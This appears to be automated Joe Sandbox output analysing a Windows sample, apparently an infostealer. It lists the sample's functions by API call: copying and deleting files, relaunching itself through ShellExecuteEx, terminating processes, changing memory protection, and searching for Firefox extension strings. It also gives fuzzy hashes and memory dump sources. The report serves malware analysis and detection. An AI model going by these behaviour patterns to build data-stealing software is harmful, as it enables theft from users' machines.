                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID: `_A
                                    • API String ID: 3722407311-2339250863
                                    • Opcode ID: b5689747017d0b1233e39e7abd20f6e68fcc7440175b3c06aa4901425a035c35
                                    • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                    • Opcode Fuzzy Hash: b5689747017d0b1233e39e7abd20f6e68fcc7440175b3c06aa4901425a035c35
                                    • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 007F68CA
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 007F698D
                                    • ExitProcess.KERNEL32 ref: 007F69BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                    • Instruction ID: 788e60f0215996025dbcd51ac03d864e32c65247ae2ba0bd2e93a4334f9641c7
                                    • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                    • Instruction Fuzzy Hash: 4731F8F5901218EADB14EB90DD9AFEDB779AF04300F404199F30966291DF786B48CF5A
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                    • ExitProcess.KERNEL32 ref: 00416755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 51a131c635dea9461ca5fbd9e512c5680335e93ee14c93c1efa3311f51896025
                                    • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                    • Opcode Fuzzy Hash: 51a131c635dea9461ca5fbd9e512c5680335e93ee14c93c1efa3311f51896025
                                    • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: @Jn@$Jn@$Jn@
                                    • API String ID: 544645111-1180188686
                                    • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                    • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                    • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                    • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcatlstrcpy
                                    • String ID: vI@$vI@
                                    • API String ID: 3905823039-1245421781
                                    • Opcode ID: fdbee14e0802cf6b2965d2f6b2dd0298cd0a1d0021e9d1410a9323d4b8571ec6
                                    • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                    • Opcode Fuzzy Hash: fdbee14e0802cf6b2965d2f6b2dd0298cd0a1d0021e9d1410a9323d4b8571ec6
                                    • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                    • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                    • wsprintfW.USER32 ref: 00418D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 659108358-2783943728
                                    • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                    • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                    • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                    • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007EA548
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 007EA666
                                    • lstrlen.KERNEL32(00000000), ref: 007EA923
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 007EA094
                                    • DeleteFileA.KERNEL32(00000000), ref: 007EA9AA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                    • String ID:
                                    • API String ID: 257331557-0
                                    • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                    • Instruction ID: 8b72810c9f6120864f964e9fcee1ddb77df5954423447aef0cdf9dc606e698d9
                                    • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                    • Instruction Fuzzy Hash: 12E1C2B291011CFBCB05EBA4DD96DFE7339AF14300F508169F25A72291DE386A4CCB62
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                    • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                    • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                    • String ID:
                                    • API String ID: 257331557-0
                                    • Opcode ID: 187ffd4c9462aa23556ef9b5443141304392004e6ff5cea6192e155308f1c96e
                                    • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                    • Opcode Fuzzy Hash: 187ffd4c9462aa23556ef9b5443141304392004e6ff5cea6192e155308f1c96e
                                    • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED6E8
                                    • lstrlen.KERNEL32(00000000), ref: 007ED8FF
                                    • lstrlen.KERNEL32(00000000), ref: 007ED913
                                    • DeleteFileA.KERNEL32(00000000), ref: 007ED992
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                    • Instruction ID: 70c7f0d741dde8ad86857139f0489c534b657be1cb601b8db632405d29cc5309
                                    • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                    • Instruction Fuzzy Hash: ED91E3B191011CEBCB14FBA4DD5ADFE7339AF14300F508569F20A62251EF786A48CB62
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                    • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                    • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 71153f48811ab97277adb1eba65f0c2a50862b60df6060ffb178010a9f1e5c68
                                    • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                    • Opcode Fuzzy Hash: 71153f48811ab97277adb1eba65f0c2a50862b60df6060ffb178010a9f1e5c68
                                    • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007EDA68
                                    • lstrlen.KERNEL32(00000000), ref: 007EDC06
                                    • lstrlen.KERNEL32(00000000), ref: 007EDC1A
                                    • DeleteFileA.KERNEL32(00000000), ref: 007EDC99
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                    • Instruction ID: 23e8475816d1de6dd38c7c05c17032bc9211784bd5a9bb57e2fadd637c03e18d
                                    • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                    • Instruction Fuzzy Hash: 9981D5B191021CEBCB14FBA4DD6ADFD7335AF54300F50456DF20A66291EF786A48CB62
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                    • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                    • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 6f72e535e7ae17eb60bcd9d89638ab31fc633a2b1ef8f0b3f434f04c74d69d2e
                                    • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                    • Opcode Fuzzy Hash: 6f72e535e7ae17eb60bcd9d89638ab31fc633a2b1ef8f0b3f434f04c74d69d2e
                                    • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                    • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: 332d76602d9979ba15099d14f0ed3dabde39ec0bd50ccc42a35f2ccae80d985e
                                    • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                    • Opcode Fuzzy Hash: 332d76602d9979ba15099d14f0ed3dabde39ec0bd50ccc42a35f2ccae80d985e
                                    • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                    APIs
                                    • memset.MSVCRT ref: 007F9752
                                      • Part of subcall function 007F8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007F9785,00000000), ref: 007F8FC2
                                      • Part of subcall function 007F8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 007F8FC9
                                      • Part of subcall function 007F8FB7: wsprintfW.USER32 ref: 007F8FDF
                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 007F9812
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F9830
                                    • CloseHandle.KERNEL32(00000000), ref: 007F983D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                    • String ID:
                                    • API String ID: 3729781310-0
                                    • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                    • Instruction ID: 3c8a881be0221b62f2fd8210e0abaf4b198e24112bcdc1188fe19ac727414cff
                                    • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                    • Instruction Fuzzy Hash: E6313AB5E0024CEFDB14DFE4CC49BEDB7B9EF45300F108459E606AA284DB786A84CB52
                                    APIs
                                    • memset.MSVCRT ref: 004194EB
                                      • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                      • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                      • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                    • CloseHandle.KERNEL32(00000000), ref: 004195D6
